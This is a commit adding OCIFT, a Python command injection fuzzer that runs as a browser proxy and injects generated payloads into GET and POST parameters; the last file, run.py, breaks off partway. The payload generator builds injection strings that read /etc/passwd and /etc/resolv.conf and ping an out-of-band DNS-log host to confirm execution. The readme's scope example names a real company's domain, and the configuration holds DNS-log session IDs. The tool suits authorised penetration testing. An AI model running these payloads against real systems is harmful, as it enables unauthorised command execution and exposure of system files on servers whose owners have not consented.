update ocift v1.0
update ocift v1.0
This commit is contained in:
48
dnslog.py
Normal file
48
dnslog.py
Normal file
@@ -0,0 +1,48 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
# author = Komi
|
||||||
|
|
||||||
|
import random
|
||||||
|
import requests
|
||||||
|
from string import ascii_lowercase
|
||||||
|
|
||||||
|
|
||||||
|
class DNSLog:
|
||||||
|
def __init__(self):
|
||||||
|
self.unique = ''
|
||||||
|
self.sessionid = ''
|
||||||
|
self.random = ''.join([random.choice(ascii_lowercase) for _ in range(10)])
|
||||||
|
self.headers = {
|
||||||
|
'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36",
|
||||||
|
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
|
||||||
|
'Referer': "http://dnslog.xfkxfk.com/dnslog/",
|
||||||
|
'Accept-Encoding': "gzip, deflate, sdch",
|
||||||
|
'Cookie': "sessionid={my_sessionid}".format(my_sessionid=self.sessionid),
|
||||||
|
}
|
||||||
|
|
||||||
|
def getRandomDomain(self, custom='poc'):
|
||||||
|
"""
|
||||||
|
full domain = [random].[custom].[unique].xfkxfk.com
|
||||||
|
e.g. fezarvgo.poc.helloworld.xfkxfk.com
|
||||||
|
"""
|
||||||
|
|
||||||
|
self.custom = custom
|
||||||
|
return '%s.%s.%s.xfkxfk.com' % (self.random, self.custom, self.unique)
|
||||||
|
|
||||||
|
def getDnsRecord(self, timeout=3):
|
||||||
|
api_base = 'http://dnslog.xfkxfk.com/dnslog/'
|
||||||
|
return requests.get(api_base, headers=self.headers, timeout=timeout).content
|
||||||
|
|
||||||
|
def getHttpRecord(self, timeout=3):
|
||||||
|
api_base = 'http://dnslog.xfkxfk.com/httplog/'
|
||||||
|
return requests.get(api_base, headers=self.headers, timeout=timeout).content
|
||||||
|
|
||||||
|
def verifyDNS(self, domain, timeout=3):
|
||||||
|
return domain in self.getDnsRecord(timeout)
|
||||||
|
|
||||||
|
def verifyHTTP(self, domain, timeout=3):
|
||||||
|
return domain in self.getHttpRecord(timeout)
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
dnslog = DNSLog()
|
||||||
|
print dnslog.verifyDNS("xfkxfk")
|
||||||
40
fuzz.conf
Normal file
40
fuzz.conf
Normal file
@@ -0,0 +1,40 @@
|
|||||||
|
# 配置各个参数,以逗号分隔
|
||||||
|
|
||||||
|
[initconfig]
|
||||||
|
|
||||||
|
# 黑名单HOST-为了避免带来不必要的麻烦.
|
||||||
|
black_hosts =.gov,localhost,127.0.0.1,google,gstatic,cnzz.com,doubleclick,police,mil.cn,gov.cn,gov.com
|
||||||
|
|
||||||
|
# 静态文件黑名单-这些不做Fuzz
|
||||||
|
url_ext_black =.ico,.flv,.css,.jpg,.png,.jpeg,.gif,.pdf,.ss3,.txt,.rar,.zip,.avi,.mp4,.swf,.wmi,.exe,.mpeg
|
||||||
|
|
||||||
|
# 白名单HOST-为了限制Fuzz的范围, 默认为空-表示对除黑名单范围外的所有地址进行Fuzz.
|
||||||
|
white_site =172.16.22.92
|
||||||
|
|
||||||
|
# 请求超时-限制每次Fuzz请求超时时间
|
||||||
|
timeout =10
|
||||||
|
|
||||||
|
# 我的DnsLog地址
|
||||||
|
my_cloudeye =ano1qu2j.xfkxfk.com
|
||||||
|
|
||||||
|
# 判断是够注入命令执行成功的关键字
|
||||||
|
checkkeys =110586256,/bin/bash,nameserver,IPv4,Windows IP
|
||||||
|
|
||||||
|
# 用于测试命令注入的基本命令
|
||||||
|
base_command =cat /etc/resolv.conf,echo 110586256,ipconfig,ping CommandInj.{my_cloudeye}
|
||||||
|
|
||||||
|
# Fuzz线程数
|
||||||
|
fuzz_count =20
|
||||||
|
|
||||||
|
# fuzz的payload类型, 默认False-表示使用自定义的规则
|
||||||
|
commix_payload_type =False
|
||||||
|
|
||||||
|
# DnsLog登录会话ID
|
||||||
|
dnslog_sessionid =q6wvxls223vykg79vkd4dn2b40zd2d1
|
||||||
|
|
||||||
|
# Your Domain
|
||||||
|
custom_domain =a12s2u2j
|
||||||
|
|
||||||
|
# 记录成功结果的Log文件
|
||||||
|
|
||||||
|
Logfile =rce_success_results.txt
|
||||||
214
fuzz.py
Normal file
214
fuzz.py
Normal file
@@ -0,0 +1,214 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
# @Time : 17/3/28 上午11:15
|
||||||
|
# @Author : Komi
|
||||||
|
# @File : fuzz.py
|
||||||
|
# @Ver: : 0.1
|
||||||
|
|
||||||
|
import re
|
||||||
|
import random
|
||||||
|
import string
|
||||||
|
import requests
|
||||||
|
import threading
|
||||||
|
import hashlib
|
||||||
|
from urlparse import urlparse
|
||||||
|
from dnslog import DNSLog
|
||||||
|
|
||||||
|
class CIF_Fuzz(threading.Thread):
|
||||||
|
def __init__(self, queue):
|
||||||
|
threading.Thread.__init__(self)
|
||||||
|
self.queue = queue
|
||||||
|
self.timeout = 5
|
||||||
|
self.dnslog_sessionid = ''
|
||||||
|
self.custom_domain = 'ano1qu2j'
|
||||||
|
self.white_site = ['']
|
||||||
|
self.url_ext_blacklist = ['']
|
||||||
|
self.black_site = ['.gov']
|
||||||
|
self.Logfile = ''
|
||||||
|
self.my_cloudeye = ""
|
||||||
|
self.CheckKey_list = ['']
|
||||||
|
self.fuzzing_payloads_list = []
|
||||||
|
self.fuzzing_finished_hash = []
|
||||||
|
|
||||||
|
# 计算一下请求的HASH,为了不重复测试.
|
||||||
|
def HASH_Calc(self, requests_dict):
|
||||||
|
md5 = hashlib.md5()
|
||||||
|
md5.update(str(requests_dict))
|
||||||
|
return md5.hexdigest()
|
||||||
|
|
||||||
|
# 发出请求
|
||||||
|
def HttpHelper(self, requests_dict, TAG):
|
||||||
|
|
||||||
|
isOver = False
|
||||||
|
fuzzing_url = requests_dict['uri']
|
||||||
|
headers = requests_dict['headers']
|
||||||
|
|
||||||
|
try:
|
||||||
|
if "GET" == requests_dict['method']:
|
||||||
|
resp = requests.get(fuzzing_url, headers=headers, timeout=self.timeout)
|
||||||
|
result = resp.content
|
||||||
|
for key in self.CheckKey_list:
|
||||||
|
if key in result:
|
||||||
|
isOver = True
|
||||||
|
break
|
||||||
|
elif "POST" == requests_dict['method']:
|
||||||
|
resp = requests.post(fuzzing_url, data=requests_dict['body'], headers=headers, timeout=self.timeout)
|
||||||
|
result = resp.content
|
||||||
|
|
||||||
|
for key in self.CheckKey_list:
|
||||||
|
if key in result:
|
||||||
|
isOver = True
|
||||||
|
break
|
||||||
|
|
||||||
|
if self.my_cloudeye in str(requests_dict):
|
||||||
|
dnslog = DNSLog()
|
||||||
|
dnslog.sessionid = self.dnslog_sessionid
|
||||||
|
dnslog.custom = self.custom_domain
|
||||||
|
count = 3
|
||||||
|
|
||||||
|
for i in range(count):
|
||||||
|
try:
|
||||||
|
flag = dnslog.verifyDNS(TAG)
|
||||||
|
if flag:
|
||||||
|
isOver = True
|
||||||
|
break
|
||||||
|
except Exception,e:
|
||||||
|
pass
|
||||||
|
|
||||||
|
except Exception,e:
|
||||||
|
print "[+] HttpHelper ERROR",e
|
||||||
|
isOver = False
|
||||||
|
|
||||||
|
return isOver
|
||||||
|
|
||||||
|
# Fuzzing_GET请求
|
||||||
|
def Fuzzing_GET(self, request):
|
||||||
|
fuzzing_payloads = self.fuzzing_payloads_list
|
||||||
|
base_url = request['uri']
|
||||||
|
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
|
||||||
|
|
||||||
|
for match in re.finditer(r"((\A|[?&])(?P<parameter>[^_]\w*)=)(?P<value>[^&#]+)", base_url):
|
||||||
|
print "[GET] Fuzzing "+match.group("parameter")
|
||||||
|
for payload_item in fuzzing_payloads:
|
||||||
|
if self.my_cloudeye in payload_item:
|
||||||
|
payload_item = payload_item.replace(self.my_cloudeye, TAG+"."+self.my_cloudeye)
|
||||||
|
payload_item = match.group("value")+payload_item
|
||||||
|
# ip=1.1.1.1;whoami
|
||||||
|
fuzzing_uri_append = base_url.replace('%s=%s' % (match.group("parameter"), match.group("value")),'%s=%s' % (match.group("parameter"), match.group("value")+payload_item))
|
||||||
|
request['uri'] = fuzzing_uri_append
|
||||||
|
isVuln_a = self.HttpHelper(request, TAG)
|
||||||
|
|
||||||
|
# ip=;whoami
|
||||||
|
fuzzing_uri_replace = base_url.replace('%s=%s' % (match.group("parameter"), match.group("value")), '%s=%s' % (match.group("parameter"), payload_item))
|
||||||
|
request['uri'] = fuzzing_uri_replace
|
||||||
|
isVuln_r = self.HttpHelper(request, TAG)
|
||||||
|
|
||||||
|
# 任意一个测试成功都结束Fuzz
|
||||||
|
if isVuln_a or isVuln_r:
|
||||||
|
self.FileHelper("GET", base_url, match.group("parameter"), payload_item, TAG)
|
||||||
|
print "[+] Fuzzing Done!!"
|
||||||
|
return
|
||||||
|
print "[+] Fuzzing Done!!"
|
||||||
|
return
|
||||||
|
|
||||||
|
# Fuzzing_POST请求
|
||||||
|
def Fuzzing_POST(self, request):
|
||||||
|
fuzzing_payloads = self.fuzzing_payloads_list
|
||||||
|
base_url = request['uri']
|
||||||
|
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
|
||||||
|
|
||||||
|
post_body = request['body']
|
||||||
|
for match in re.finditer(r"((\A|[?&])(?P<parameter>[^_]\w*)=)(?P<value>[^&#]+)", post_body):
|
||||||
|
try:
|
||||||
|
print "[POST] Fuzzing "+match.group("parameter")
|
||||||
|
for payload_item in fuzzing_payloads:
|
||||||
|
if self.my_cloudeye in payload_item:
|
||||||
|
payload_item = payload_item.replace(self.my_cloudeye, TAG+"."+self.my_cloudeye)
|
||||||
|
payload_item = match.group("value")+payload_item
|
||||||
|
fuzzing_post_body = post_body.replace('%s=%s' % (match.group("parameter"), match.group("value")),'%s=%s' % (match.group("parameter"), payload_item))
|
||||||
|
request['body'] = fuzzing_post_body
|
||||||
|
isOver = self.HttpHelper(request, TAG)
|
||||||
|
if isOver:
|
||||||
|
self.FileHelper("POST", base_url, match.group("parameter"), payload_item, TAG)
|
||||||
|
print "[success] Fuzzing Done!!"
|
||||||
|
return
|
||||||
|
print "[failed] Fuzzing Done!!"
|
||||||
|
except :
|
||||||
|
pass
|
||||||
|
return
|
||||||
|
|
||||||
|
# header暂时不支持Fuzzing
|
||||||
|
def Fuzzing_HEADER(self, request):
|
||||||
|
print "Fuzzing HEADER"
|
||||||
|
# headers_map = request['headers'].get_all()
|
||||||
|
# for (k,v) in headers_map:
|
||||||
|
# print "%s - %s" % (k,v)
|
||||||
|
|
||||||
|
# 记录到文件
|
||||||
|
def FileHelper(self, HTTP_Method, Rce_URL, parameter, payload, TAG):
|
||||||
|
wfile = open(self.Logfile, mode='a+')
|
||||||
|
found_rce_text = '''\n\
|
||||||
|
+==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==+
|
||||||
|
+=+TAG: {TAG}
|
||||||
|
+=+URL: {RCE_URL}
|
||||||
|
+=+method: {HTTP_Method}
|
||||||
|
+=+param: {parameter}
|
||||||
|
+=+payload: {payload}
|
||||||
|
+==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==+\n
|
||||||
|
'''
|
||||||
|
found_rce_text = found_rce_text.replace("{TAG}", TAG).replace("{RCE_URL}", Rce_URL).replace("{HTTP_Method}", HTTP_Method).replace("{parameter}", parameter).replace("{payload}", payload)
|
||||||
|
|
||||||
|
print found_rce_text
|
||||||
|
|
||||||
|
wfile.write(found_rce_text)
|
||||||
|
wfile.write("\r\n")
|
||||||
|
wfile.flush()
|
||||||
|
wfile.close()
|
||||||
|
|
||||||
|
def check_white_site(self, uri):
|
||||||
|
if len(self.white_site) ==0:
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
for u in self.white_site:
|
||||||
|
if u in uri:
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
|
||||||
|
def check_black_site(self, uri):
|
||||||
|
for u in self.black_site:
|
||||||
|
if u in uri:
|
||||||
|
return False
|
||||||
|
return True
|
||||||
|
|
||||||
|
def check_url_blackext(self, uri):
|
||||||
|
not_staticFlag = True
|
||||||
|
url_ext = urlparse(uri).path[-4:].lower()
|
||||||
|
|
||||||
|
if ".js" in uri and ".jsp" not in url_ext:
|
||||||
|
not_staticFlag = False
|
||||||
|
else:
|
||||||
|
for u in self.url_ext_blacklist:
|
||||||
|
if u in url_ext:
|
||||||
|
not_staticFlag = False
|
||||||
|
|
||||||
|
return not_staticFlag
|
||||||
|
|
||||||
|
|
||||||
|
def run(self):
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
request = self.queue.get()
|
||||||
|
uri = request['uri']
|
||||||
|
hash_value = self.HASH_Calc(requests_dict=request)
|
||||||
|
is_notstatic = self.check_url_blackext(uri)
|
||||||
|
|
||||||
|
# 判断是否已经Fuzzing过了、URL是否在测试范围内、是否在黑名单里、是否是静态文件
|
||||||
|
if hash_value not in self.fuzzing_finished_hash and self.check_white_site(uri) and self.check_black_site(uri) and is_notstatic:
|
||||||
|
self.fuzzing_finished_hash.append(hash_value)
|
||||||
|
method = request['method']
|
||||||
|
if "POST" in method:
|
||||||
|
self.Fuzzing_POST(request)
|
||||||
|
elif "GET" in method:
|
||||||
|
self.Fuzzing_GET(request)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
129
make_payload.py
Normal file
129
make_payload.py
Normal file
@@ -0,0 +1,129 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
# @Time : 17/3/30 上午10:34
|
||||||
|
# @Author : Komi
|
||||||
|
# @File : make_payload.py
|
||||||
|
# @Ver: : 0.1
|
||||||
|
|
||||||
|
|
||||||
|
class PayloadGenerate:
|
||||||
|
def __init__(self, base_command_list):
|
||||||
|
self.base_command = base_command_list
|
||||||
|
self.fuzzing_payloads_list = []
|
||||||
|
self.fuzzing_finished_url = []
|
||||||
|
|
||||||
|
# The white-spaces
|
||||||
|
self.WHITESPACE = ["$IFS", "%20"]
|
||||||
|
|
||||||
|
# The command injection suffixes.
|
||||||
|
self.SUFFIXES = ["'", "\""]
|
||||||
|
|
||||||
|
# The command injection separators.
|
||||||
|
self.SEPARATORS = [";", "|", "&", "||"]
|
||||||
|
|
||||||
|
# The command injection prefixes.
|
||||||
|
self.PREFIXES = ["'", "\""]
|
||||||
|
|
||||||
|
def add_prefixes(self, payload, prefix):
|
||||||
|
payload = prefix + payload
|
||||||
|
|
||||||
|
return payload
|
||||||
|
|
||||||
|
def add_suffixes(self, payload, suffix):
|
||||||
|
payload = payload + suffix
|
||||||
|
|
||||||
|
return payload
|
||||||
|
|
||||||
|
def add_sp_before(self, payload, sp):
|
||||||
|
if payload:
|
||||||
|
return sp + payload
|
||||||
|
else:
|
||||||
|
return ''
|
||||||
|
|
||||||
|
def add_single_quote(self, s):
|
||||||
|
if s:
|
||||||
|
return "'{}'".format(s)
|
||||||
|
else:
|
||||||
|
return ''
|
||||||
|
|
||||||
|
def add_double_quotes(self, s):
|
||||||
|
if s:
|
||||||
|
return '"{}"'.format(s)
|
||||||
|
else:
|
||||||
|
return ''
|
||||||
|
|
||||||
|
def replace_space(self, payload, whitespace):
|
||||||
|
if payload:
|
||||||
|
return payload.replace(' ', whitespace)
|
||||||
|
else:
|
||||||
|
return ''
|
||||||
|
|
||||||
|
# `whoami`
|
||||||
|
def add_backquote(self, payload):
|
||||||
|
if payload:
|
||||||
|
return "`{}`".format(payload)
|
||||||
|
else:
|
||||||
|
return ''
|
||||||
|
|
||||||
|
# $(reboot)
|
||||||
|
def add_brackets(self, payload):
|
||||||
|
if payload:
|
||||||
|
return "$({})".format(payload)
|
||||||
|
else:
|
||||||
|
return ''
|
||||||
|
|
||||||
|
# 这是取的commix的payload生成方式
|
||||||
|
def make_commix_payloads(self, TAG):
|
||||||
|
|
||||||
|
for whitespace in self.WHITESPACE:
|
||||||
|
for prefix in self.PREFIXES:
|
||||||
|
for suffix in self.SUFFIXES:
|
||||||
|
for sp in self.SEPARATORS:
|
||||||
|
payloads = []
|
||||||
|
p1 = 'echo {}'.format(TAG)
|
||||||
|
p2 = 'echo {}'.format(self.add_single_quote(TAG))
|
||||||
|
p3 = 'echo {}'.format(self.add_double_quotes(TAG))
|
||||||
|
payloads += [p1, p2, p3]
|
||||||
|
|
||||||
|
payloads += [self.add_sp_before(p1, sp), self.add_sp_before(p2, sp), self.add_sp_before(p3, sp)]
|
||||||
|
payloads += [self.replace_space(p1, whitespace), self.replace_space(p2, whitespace), self.replace_space(p3, whitespace)]
|
||||||
|
payloads += [self.replace_space(self.add_sp_before(p1, sp), whitespace), self.replace_space(self.add_sp_before(p2, sp),whitespace),
|
||||||
|
self.replace_space(self.add_sp_before(p3, sp),whitespace)]
|
||||||
|
|
||||||
|
# Fix prefixes / suffixes
|
||||||
|
for payload in payloads:
|
||||||
|
payload = self.add_prefixes(payload, prefix)
|
||||||
|
payload = self.add_suffixes(payload, suffix)
|
||||||
|
|
||||||
|
self.fuzzing_payloads_list.append(payload)
|
||||||
|
|
||||||
|
# 这我自定义的payload
|
||||||
|
def fuzz_mypayloads(self):
|
||||||
|
for whitespace in self.WHITESPACE:
|
||||||
|
for prefix in self.PREFIXES:
|
||||||
|
for suffix in self.SUFFIXES:
|
||||||
|
for sp in self.SEPARATORS:
|
||||||
|
for cmd in self.base_command:
|
||||||
|
payloads = []
|
||||||
|
# index.php?id=cat /etc/passwd
|
||||||
|
payloads += [cmd]
|
||||||
|
# index.php?id=`cat /etc/passwd`
|
||||||
|
payloads += [self.add_backquote(cmd)]
|
||||||
|
# index.php?id=$(cat /etc/passwd)
|
||||||
|
payloads += [self.add_brackets(cmd)]
|
||||||
|
# index.php?id=;cat /etc/passwd
|
||||||
|
payloads += [self.add_sp_before(cmd, sp)]
|
||||||
|
# index.php?id=;`cat /etc/passwd`
|
||||||
|
payloads += [self.add_sp_before(self.add_backquote(cmd), sp)]
|
||||||
|
# index.php?id=;$(cat /etc/passwd)
|
||||||
|
payloads += [self.add_sp_before(self.add_brackets(cmd), sp)]
|
||||||
|
# index.php?id=cat$IFS/etc/passwd
|
||||||
|
payloads += [self.replace_space(cmd, whitespace)]
|
||||||
|
# index.php?id=;cat$IFS/etc/passwd
|
||||||
|
payloads += [self.replace_space(self.add_sp_before(cmd, sp), whitespace)]
|
||||||
|
# index.php?id='cat /etc/passwd'
|
||||||
|
for payload in payloads:
|
||||||
|
payload = self.add_prefixes(payload, prefix)
|
||||||
|
payload = self.add_suffixes(payload, suffix)
|
||||||
|
|
||||||
|
self.fuzzing_payloads_list.append(payload)
|
||||||
114
readme.md
Normal file
114
readme.md
Normal file
@@ -0,0 +1,114 @@
|
|||||||
|
# OCIFT
|
||||||
|
一个半自动化命令注入漏洞Fuzz工具(One Semi-automation command injection vulnerability Fuzz tool)
|
||||||
|
|
||||||
|
## 1. OCIFT是什么
|
||||||
|
|
||||||
|
一个半自动化命令注入漏洞Fuzz工具(One Semi-automation command injection vulnerability Fuzz tool)简写为:OCIFT
|
||||||
|
|
||||||
|
## 2. OCIFT有什么用
|
||||||
|
|
||||||
|
这是一种半自动化的黑盒测试工具,它可以帮助渗透测试人员或代码审计人员在愉快的上网的同时,深度挖掘目标应用系统存在的命令注入漏洞。
|
||||||
|
|
||||||
|
## 3. OCIFT有什么特点
|
||||||
|
|
||||||
|
* Payload基于Commix生成方式修改而来(需要持续完善).
|
||||||
|
* 基于浏览器代理的半自动化Fuzz.
|
||||||
|
* 多线程Fuzz速度快,不影响正常浏览器访问使用.
|
||||||
|
* 支持设置白名单限制Fuzz范围.
|
||||||
|
* 支持设置黑名单避免带来不必要的麻烦.
|
||||||
|
* 支持DNSLog辅助验证
|
||||||
|
|
||||||
|
## 4. OCIFT实现思路
|
||||||
|
|
||||||
|
基于Tornado的实现一个代理服务器,解析GET/POST请求提取Fuzz点,带入payload进行Fuzz测试。
|
||||||
|
|
||||||
|
* 文件结构说明
|
||||||
|
|
||||||
|
`➜ cifuzz git:(master) ✗ tree
|
||||||
|
.
|
||||||
|
|____run.py 主程序入口
|
||||||
|
|____dnslog.py DNSLog SDK
|
||||||
|
|____fuzz.conf 配置文件
|
||||||
|
|____fuzz.py Fuzz线程
|
||||||
|
|____make_payload.py Payload生成器
|
||||||
|
|____readme.md 说明文档`
|
||||||
|
|
||||||
|
## 5. 配置文件说明
|
||||||
|
|
||||||
|
* 配置各个参数,以逗号分隔
|
||||||
|
|
||||||
|
`[initconfig]`
|
||||||
|
|
||||||
|
* 黑名单HOST-为了避免带来不必要的麻烦
|
||||||
|
|
||||||
|
`black_hosts =.gov,localhost,127.0.0.1,google,gstatic,cnzz.com,doubleclick,police,mil.cn,gov.cn,gov.com`
|
||||||
|
|
||||||
|
* 静态文件黑名单-这些不做Fuzz
|
||||||
|
|
||||||
|
`url_ext_black =.ico,.flv,.css,.jpg,.png,.jpeg,.gif,.pdf,.ss3,.txt,.rar,.zip,.avi,.mp4,.swf,.wmi,.exe,.mpeg`
|
||||||
|
|
||||||
|
* 白名单HOST-为了限制Fuzz的范围, 默认为空-表示对除黑名单范围外的所有地址进行Fuzz.
|
||||||
|
|
||||||
|
`white_site =qunar`
|
||||||
|
|
||||||
|
* 请求超时-限制每次Fuzz请求超时时间
|
||||||
|
|
||||||
|
`timeout =10`
|
||||||
|
|
||||||
|
* 我的DnsLog地址
|
||||||
|
|
||||||
|
`my_cloudeye =ano1qu2j.xfkxfk.com`
|
||||||
|
|
||||||
|
* 判断是够注入命令执行成功的关键字
|
||||||
|
|
||||||
|
`checkkeys =110586256,/bin/bash,nameserver,IPv4,Windows IP`
|
||||||
|
|
||||||
|
* 用于测试命令注入的基本命令
|
||||||
|
|
||||||
|
`base_command =cat /etc/resolv.conf,echo 110586256,cat /etc/passwd,ipconfig,ping CommandInj.{my_cloudeye},echo 110586256<nul`
|
||||||
|
|
||||||
|
* Fuzz线程数
|
||||||
|
|
||||||
|
`fuzz_count =20`
|
||||||
|
|
||||||
|
* fuzz的payload类型, 默认False-表示使用自定义的规则
|
||||||
|
|
||||||
|
`commix_payload_type = False`
|
||||||
|
|
||||||
|
* DnsLog登录会话ID,我用的xfkxfk牛的dnslog.xfkxfk.com
|
||||||
|
|
||||||
|
`dnslog_sessionid =q6wva2e3skg79vkdegra2bygft0d1`
|
||||||
|
|
||||||
|
* Your Domain
|
||||||
|
|
||||||
|
`custom_domain =a2fta2j`
|
||||||
|
|
||||||
|
* 记录成功结果的Log文件
|
||||||
|
|
||||||
|
`Logfile =rce_success_results.txt`
|
||||||
|
|
||||||
|
## 6.如何使用
|
||||||
|
|
||||||
|
* 1.安装模块
|
||||||
|
|
||||||
|
`pip install tornado
|
||||||
|
pip install requests`
|
||||||
|
|
||||||
|
* 2.根据自己需要完成文件fuzz.conf的配置
|
||||||
|
* 3.启用主程序
|
||||||
|
|
||||||
|
`python run.py 8089`
|
||||||
|
如下图:
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
* 4.设置浏览器代理
|
||||||
|
然后会自动开始Fuzz
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
## 7.总结
|
||||||
|
|
||||||
|
* 基本实现了想要的半自动化Fuzz功能
|
||||||
|
* payload还需要不断优化
|
||||||
|
|
||||||
292
run.py
Normal file
292
run.py
Normal file
@@ -0,0 +1,292 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
# @Time : 17/4/8 上午00:00
|
||||||
|
# @Author : Komi
|
||||||
|
# @File : run.py
|
||||||
|
# @Ver: : 0.1
|
||||||
|
|
||||||
|
helpinfo = '''\
|
||||||
|
##########################################################
|
||||||
|
# _____ ______ ___ _____ __ __ #
|
||||||
|
# / ___ \ / ____/ | | |_ _ | |_____| #
|
||||||
|
# / / \ \ / / | | | |_ | | #
|
||||||
|
# | \___ / / | \ ____ | | | _| | | #
|
||||||
|
# \ __ __/ \ ____ / |___| |_| |___| v1.0 #
|
||||||
|
##########################################################
|
||||||
|
# 一个半自动化命令注入漏洞Fuzz工具
|
||||||
|
Named From: OCIFT(OS Command Injection Fuzzy Tool)
|
||||||
|
Referer:
|
||||||
|
https://github.com/commixproject/commix
|
||||||
|
https://www.owasp.org/index.php/Command_Injection
|
||||||
|
Instructions:
|
||||||
|
1、python osift.py 8081 (开启8081作为代理端口)
|
||||||
|
2、浏览器设置通过代理地址: http://127.0.0.1:8081进行访问
|
||||||
|
3、测试结果会记录在日志文件里,默认: rce_success_results.txt
|
||||||
|
'''
|
||||||
|
print helpinfo
|
||||||
|
|
||||||
|
import logging
|
||||||
|
import socket
|
||||||
|
import string
|
||||||
|
import random
|
||||||
|
from urlparse import urlparse
|
||||||
|
import os,sys
|
||||||
|
from Queue import Queue
|
||||||
|
import threading
|
||||||
|
import tornado.httpserver
|
||||||
|
import tornado.ioloop
|
||||||
|
import tornado.iostream
|
||||||
|
import tornado.web
|
||||||
|
from tornado.web import RequestHandler
|
||||||
|
import tornado.httpclient
|
||||||
|
from fuzz import CIF_Fuzz
|
||||||
|
from make_payload import PayloadGenerate
|
||||||
|
import ConfigParser
|
||||||
|
|
||||||
|
# logging.basicConfig(level=logging.ERROR)
|
||||||
|
|
||||||
|
class ProxyManage:
|
||||||
|
def run_proxy(self, address, port, handler):
|
||||||
|
''''
|
||||||
|
Start proxy server
|
||||||
|
'''
|
||||||
|
app = tornado.web.Application([
|
||||||
|
(r'.*', handler),
|
||||||
|
])
|
||||||
|
app.listen(port, address)
|
||||||
|
logging.info("Starting HTTP proxy on {0}".format(address + ':' + str(port)))
|
||||||
|
ioloop = tornado.ioloop.IOLoop.instance()
|
||||||
|
ioloop.start()
|
||||||
|
|
||||||
|
def close_proxy(self):
|
||||||
|
ioloop = tornado.ioloop.IOLoop.instance()
|
||||||
|
logging.info('stop proxy server')
|
||||||
|
ioloop.stop()
|
||||||
|
|
||||||
|
def get_proxy(url):
|
||||||
|
url_parsed = urlparse(url, scheme='http')
|
||||||
|
proxy_key = '%s_proxy' % url_parsed.scheme
|
||||||
|
return os.environ.get(proxy_key)
|
||||||
|
|
||||||
|
def parse_proxy(proxy):
|
||||||
|
proxy_parsed = urlparse(proxy, scheme='http')
|
||||||
|
return proxy_parsed.hostname, proxy_parsed.port
|
||||||
|
|
||||||
|
def fetch_request(url, callback, **kwargs):
|
||||||
|
proxy = get_proxy(url)
|
||||||
|
if proxy:
|
||||||
|
tornado.httpclient.AsyncHTTPClient.configure(
|
||||||
|
'tornado.curl_httpclient.CurlAsyncHTTPClient')
|
||||||
|
host, port = parse_proxy(proxy)
|
||||||
|
kwargs['proxy_host'] = host
|
||||||
|
kwargs['proxy_port'] = port
|
||||||
|
|
||||||
|
req = tornado.httpclient.HTTPRequest(url, **kwargs)
|
||||||
|
client = tornado.httpclient.AsyncHTTPClient()
|
||||||
|
client.fetch(req, callback, raise_error="error")
|
||||||
|
|
||||||
|
class LoadConfig:
|
||||||
|
def __init__(self):
|
||||||
|
self.version = "V1.0"
|
||||||
|
|
||||||
|
def read_config(self):
|
||||||
|
self.conf = ConfigParser.SafeConfigParser()
|
||||||
|
self.conf.read('fuzz.conf')
|
||||||
|
self.initconfig = self.conf.items('initconfig')
|
||||||
|
|
||||||
|
def get_configprperity(self, key=""):
|
||||||
|
|
||||||
|
for tmp in self.initconfig:
|
||||||
|
if key == tmp[0] and key != "":
|
||||||
|
return tmp[1]
|
||||||
|
|
||||||
|
class ProxyHandler(RequestHandler):
|
||||||
|
SUPPORTED_METHODS = ['GET', 'POST', 'CONNECT', "OPTIONS"]
|
||||||
|
queue = Queue()
|
||||||
|
print "[+] Load configuration file..."
|
||||||
|
|
||||||
|
londconf = LoadConfig()
|
||||||
|
londconf.read_config()
|
||||||
|
londconf.get_configprperity()
|
||||||
|
|
||||||
|
my_cloudeye = londconf.get_configprperity('my_cloudeye')
|
||||||
|
white_site = londconf.get_configprperity('white_site')
|
||||||
|
black_site = londconf.get_configprperity('black_hosts')
|
||||||
|
checkkeys = londconf.get_configprperity('checkkeys')
|
||||||
|
checkkey_list = checkkeys.split(",")
|
||||||
|
fuzz_count = londconf.get_configprperity('fuzz_count')
|
||||||
|
custom_domain = londconf.get_configprperity('custom_domain')
|
||||||
|
dnslog_sessionid = londconf.get_configprperity('dnslog_sessionid')
|
||||||
|
commix_payload_type = londconf.get_configprperity('commix_payload_type')
|
||||||
|
url_ext_black = londconf.get_configprperity('url_ext_black')
|
||||||
|
|
||||||
|
Logfile = londconf.get_configprperity('Logfile')
|
||||||
|
|
||||||
|
base_command = londconf.get_configprperity("base_command")
|
||||||
|
|
||||||
|
base_command_list = []
|
||||||
|
for base_command in base_command.split(","):
|
||||||
|
base_command_list.append(base_command.format(my_cloudeye=my_cloudeye))
|
||||||
|
|
||||||
|
timeout = londconf.get_configprperity("timeout")
|
||||||
|
print "[+] Initialize Payloads..."
|
||||||
|
PayloadME = PayloadGenerate(base_command_list)
|
||||||
|
if commix_payload_type == "False":
|
||||||
|
PayloadME.fuzz_mypayloads()
|
||||||
|
else:
|
||||||
|
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
|
||||||
|
PayloadME.make_commix_payloads(TAG=TAG)
|
||||||
|
checkkey_list.append(TAG)
|
||||||
|
|
||||||
|
fuzzing_payloads_list = list(set(PayloadME.fuzzing_payloads_list))
|
||||||
|
print "[+] we have %s payloads " % len(fuzzing_payloads_list)
|
||||||
|
|
||||||
|
print "[+] Start Fuzzing Threads..."
|
||||||
|
